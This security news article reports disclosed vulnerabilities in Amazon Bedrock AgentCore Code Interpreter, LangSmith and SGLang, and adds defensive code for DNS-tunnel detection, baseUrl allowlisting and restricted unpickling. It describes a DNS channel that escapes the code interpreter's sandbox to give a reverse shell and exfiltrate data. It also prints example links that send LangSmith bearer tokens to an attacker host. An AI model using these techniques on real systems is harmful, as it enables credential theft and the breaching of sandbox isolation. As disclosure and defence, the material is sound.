AI Security Under Scrutiny: Flaws Uncovered in Amazon Bedrock, LangSmith, and SGLang
Researchers have recently disclosed critical vulnerabilities impacting AI code execution environments and related frameworks, raising concerns about data exfiltration, account takeovers, and remote code execution.
Cybersecurity researchers have unveiled new methods for exfiltrating sensitive data from artificial intelligence (AI) code execution environments, utilizing domain name system (DNS) queries. These findings, along with separate disclosures regarding **LangSmith** and **SGLang**, highlight the growing need for robust security measures in AI infrastructure.

### Amazon Bedrock AgentCore Code Interpreter Vulnerability
A report by **BeyondTrust**, published this week, details how **Amazon Bedrock AgentCore Code Interpreter's** sandbox mode permits outbound DNS queries, potentially enabling attackers to establish interactive shells and bypass network isolation. This issue, currently without a **CVE** identifier, has been assigned a CVSS score of 7.5 out of 10.0.
**Amazon Bedrock AgentCore Code Interpreter**, launched in August 2025, is designed to allow AI agents to securely execute code within isolated sandbox environments, preventing agentic workloads from accessing external systems.
According to **Kinnaird McQuade**, chief security architect at **BeyondTrust**, the fact that the service permits DNS queries despite a "no network access" configuration could allow "threat actors to establish command-and-control channels and data exfiltration over DNS in certain scenarios, bypassing the expected network isolation controls."
In a proof-of-concept attack, researchers demonstrated how a threat actor could leverage this behavior to establish a bidirectional communication channel via DNS queries and responses. This could lead to obtaining an interactive reverse shell, exfiltrating sensitive information through DNS queries (assuming the IAM role has the necessary permissions to access **AWS** resources like **S3** buckets), and executing commands.
Furthermore, the DNS communication channel can be exploited to deliver additional payloads to the Code Interpreter, prompting it to poll a DNS command-and-control (C2) server for commands stored in DNS A records, execute them, and return the results via DNS subdomain queries.
The researchers emphasized that misconfigured IAM roles could exacerbate the problem. An overprivileged role assigned to the service could grant it overly broad permissions to access sensitive data.
"This research demonstrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters," **BeyondTrust** stated. "By using this method, attackers could have exfiltrated sensitive data from AWS resources accessible via the Code Interpreter's IAM role, potentially causing downtime, data breaches of sensitive customer information, or deleted infrastructure."

Following a responsible disclosure in September 2025, **Amazon** classified the behavior as intended functionality rather than a defect. They recommend using VPC mode instead of sandbox mode for complete network isolation and suggest employing a DNS firewall to filter outbound DNS traffic.
**Jason Soroko**, senior fellow at **Sectigo**, advises, "To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode."
He added, "Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution. Finally, security teams must rigorously audit the IAM roles attached to these interpreters, strictly enforcing the principle of least privilege to restrict the blast radius of any potential compromise."
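One way to surface the DNS tunnelling pattern described above in Route 53 Resolver query logs, as an added example that is not part of BeyondTrust's research or any AWS tooling: the log lines are constructed, their field names follow the Resolver query-log JSON format, and the label-length and per-domain thresholds are assumptions to tune per environment.

```python
import json
from collections import defaultdict

# Constructed records in the shape of Route 53 Resolver query logs (JSON lines);
# the field names follow that format, every value is invented for this example.
SAMPLE_LOG = """\
{"srcaddr":"10.0.1.23","query_name":"pypi.org.","query_type":"A","rcode":"NOERROR"}
{"srcaddr":"10.0.1.23","query_name":"files.pythonhosted.org.","query_type":"A","rcode":"NOERROR"}
{"srcaddr":"10.0.1.42","query_name":"636f6e737472756374.0.c2-example.invalid.","query_type":"A","rcode":"NOERROR"}
{"srcaddr":"10.0.1.42","query_name":"65642d73616d706c65.1.c2-example.invalid.","query_type":"A","rcode":"NOERROR"}
{"srcaddr":"10.0.1.42","query_name":"2d7265636f72642d30.2.c2-example.invalid.","query_type":"A","rcode":"NOERROR"}
{"srcaddr":"10.0.1.42","query_name":"312c7265636f72642d.3.c2-example.invalid.","query_type":"A","rcode":"NOERROR"}
{"srcaddr":"10.0.1.42","query_name":"30322c7265636f7264.4.c2-example.invalid.","query_type":"A","rcode":"NOERROR"}
{"srcaddr":"10.0.1.42","query_name":"pypi.org.","query_type":"A","rcode":"NOERROR"}
"""
HEX = set("0123456789abcdef")

def labels(qname):
    return [part for part in qname.lower().rstrip(".").split(".") if part]

def apex(qname, depth=2):
    """Registered-domain approximation: the last `depth` labels (no public-suffix list offline)."""
    return ".".join(labels(qname)[-depth:])

def chunk_indicators(qname):
    """Signs that a subdomain carries an encoded chunk: long labels or hex-only labels.
    Individually noisy (CDN hashes look similar), so they are only counted per bucket."""
    subs = labels(qname)[:-2]
    found = []
    if any(len(lab) >= 16 for lab in subs):
        found.append("long_label")
    if any(len(lab) >= 8 and set(lab) <= HEX for lab in subs):
        found.append("hex_label")
    return found

def analyze(log_text, min_unique=5):
    """Alert on a (source, domain) pair that issues many distinct encoded-looking names:
    the shape of data chunks leaving, and commands being polled, through DNS."""
    buckets = defaultdict(lambda: {"names": set(), "flagged": 0})
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        bucket = buckets[(rec["srcaddr"], apex(rec["query_name"]))]
        bucket["names"].add(rec["query_name"])
        if chunk_indicators(rec["query_name"]):
            bucket["flagged"] += 1
    return [
        {"srcaddr": src, "domain": dom, "unique_names": len(b["names"]), "flagged": b["flagged"]}
        for (src, dom), b in buckets.items()
        if len(b["names"]) >= min_unique and b["flagged"] >= min_unique
    ]
```

The same bucketing works on a Resolver DNS Firewall's query-count output; the per-domain threshold is what keeps single hashed CDN lookups from alerting.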

### LangSmith Account Takeover Vulnerability
In related news, **Miggo Security** disclosed a high-severity security flaw in **LangSmith** (**CVE-2026-25750**, CVSS score: 8.5) that could lead to token theft and account takeover. This issue, affecting both self-hosted and cloud deployments, was addressed in **LangSmith** version 0.12.71, released in December 2025.
The vulnerability stems from a lack of validation on the baseUrl parameter, allowing for URL parameter injection. An attacker could exploit this by tricking a user into clicking a specially crafted link, leading to the theft of their bearer token, user ID, and workspace ID. Example links include:
* Cloud - smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
* Self-hosted - <LangSmith_domain_of_the_customer>/studio/?baseUrl=https://attacker-server.com
Successful exploitation could grant unauthorized access to the AI's trace history, where reviewing tool calls could expose internal SQL queries, CRM customer records, or proprietary source code.
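An illustration of the bug class behind the baseUrl issue, added here and not LangSmith's code or its actual fix: a hypothetical frontend that takes its API base from the query string, beside an allowlisting check that keeps the bearer token going only to known origins. The origin names are placeholders assumed for the example.

```python
from urllib.parse import parse_qs, urlsplit

# Placeholder origins standing in for a deployment's own API hosts (an assumption
# for this example; not LangSmith's configuration).
ALLOWED_ORIGINS = {
    "https://api.example-observability.invalid",
    "https://app.example-observability.invalid",
}
DEFAULT_BASE = "https://api.example-observability.invalid"

def base_url_unchecked(query_string):
    """Vulnerable pattern (hypothetical): the query string alone decides which host
    the authenticated API calls, bearer token included, are sent to."""
    return parse_qs(query_string).get("baseUrl", [None])[0]

def origin_of(url):
    """Reduce a URL to scheme://host[:port]; None if it is not a plain https origin."""
    try:
        parts = urlsplit(url)
        hostname, port = parts.hostname, parts.port  # .port raises on junk like ':abc'
    except ValueError:
        return None
    if parts.scheme != "https" or not hostname:
        return None
    if parts.username is not None or parts.password is not None:
        return None  # rejects https://trusted-host@other-host userinfo tricks
    host = hostname.lower()
    if port not in (None, 443):
        host = f"{host}:{port}"
    return f"https://{host}"

def base_url_checked(query_string, default=DEFAULT_BASE):
    """Hardened pattern: honour baseUrl only when its origin is allowlisted, and keep
    just the origin (path, query and fragment dropped); otherwise use the default."""
    candidate = base_url_unchecked(query_string)
    if candidate is None:
        return default
    origin = origin_of(candidate)
    return origin if origin in ALLOWED_ORIGINS else default
```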
**Liad Eliyahu** and **Eliana Vuijsje**, researchers at **Miggo**, stated, "A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link."

They added, "This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails. This risk is compounded because, like 'traditional' software, AI Agents have deep access to internal data sources and third-party services."
### Unsafe Pickle Deserialization Flaws in SGLang
Finally, vulnerabilities have been identified in **SGLang**, a popular open-source framework for serving large language models and multimodal AI models. The flaws involve unsafe pickle deserialization, and successful exploitation could result in remote code execution.
These vulnerabilities, discovered by **Igor Stepansky**, a researcher at **Orca Security**, remain unpatched. The flaws are:
* **CVE-2026-3059** (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability through the ZeroMQ (aka ZMQ) broker, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang's multimodal generation module.
* **CVE-2026-3060** (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang
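A defensive stand-in for a bare pickle.loads() at a broker boundary, added as an example and not SGLang's code: an Unpickler that refuses any global lookup not on an allowlist, so the stream cannot name a callable to invoke. The allowlist and message-size cap are assumptions for the example; it limits the damage of a hostile pickle, while the durable fix is authenticating the socket and moving to a format that cannot reference code, such as JSON or msgpack.

```python
import io
import pickle

# Allowlist of globals the receiver is prepared to reconstruct. Assumption for
# this example: messages carry only plain containers and scalars, so nothing
# outside builtins is ever needed (these never trigger find_class anyway).
SAFE_GLOBALS = {
    ("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple"),
    ("builtins", "set"), ("builtins", "frozenset"), ("builtins", "bytes"),
    ("builtins", "str"), ("builtins", "int"), ("builtins", "float"),
}
MAX_MESSAGE_BYTES = 1 << 20  # cap on one message, an assumption for the example

class RestrictedUnpickler(pickle.Unpickler):
    """Every GLOBAL/STACK_GLOBAL opcode goes through find_class; refusing unknown
    names means the stream cannot reach an arbitrary callable."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused global {module}.{name}")

def restricted_loads(data):
    if len(data) > MAX_MESSAGE_BYTES:
        raise pickle.UnpicklingError("message too large")
    return RestrictedUnpickler(io.BytesIO(data)).load()

def loads_or_reject(data):
    """Boundary wrapper: (True, value) or (False, reason). Whatever a malformed
    stream raises is treated as a rejected message, never propagated."""
    try:
        return True, restricted_loads(data)
    except Exception as exc:  # untrusted bytes can raise many exception types
        return False, f"{type(exc).__name__}: {exc}"

def demo_payloads():
    """Constructed inputs: a plain request, a pickle naming a global, and junk bytes."""
    import collections
    return {
        "plain": pickle.dumps({"prompt": "hi", "n": 2, "tags": ["a", "b"]}),
        "global": pickle.dumps(collections.OrderedDict(a=1)),
        "junk": b"not a pickle",
    }

if __name__ == "__main__":
    for label, data in demo_payloads().items():
        print(label, loads_or_reject(data))
```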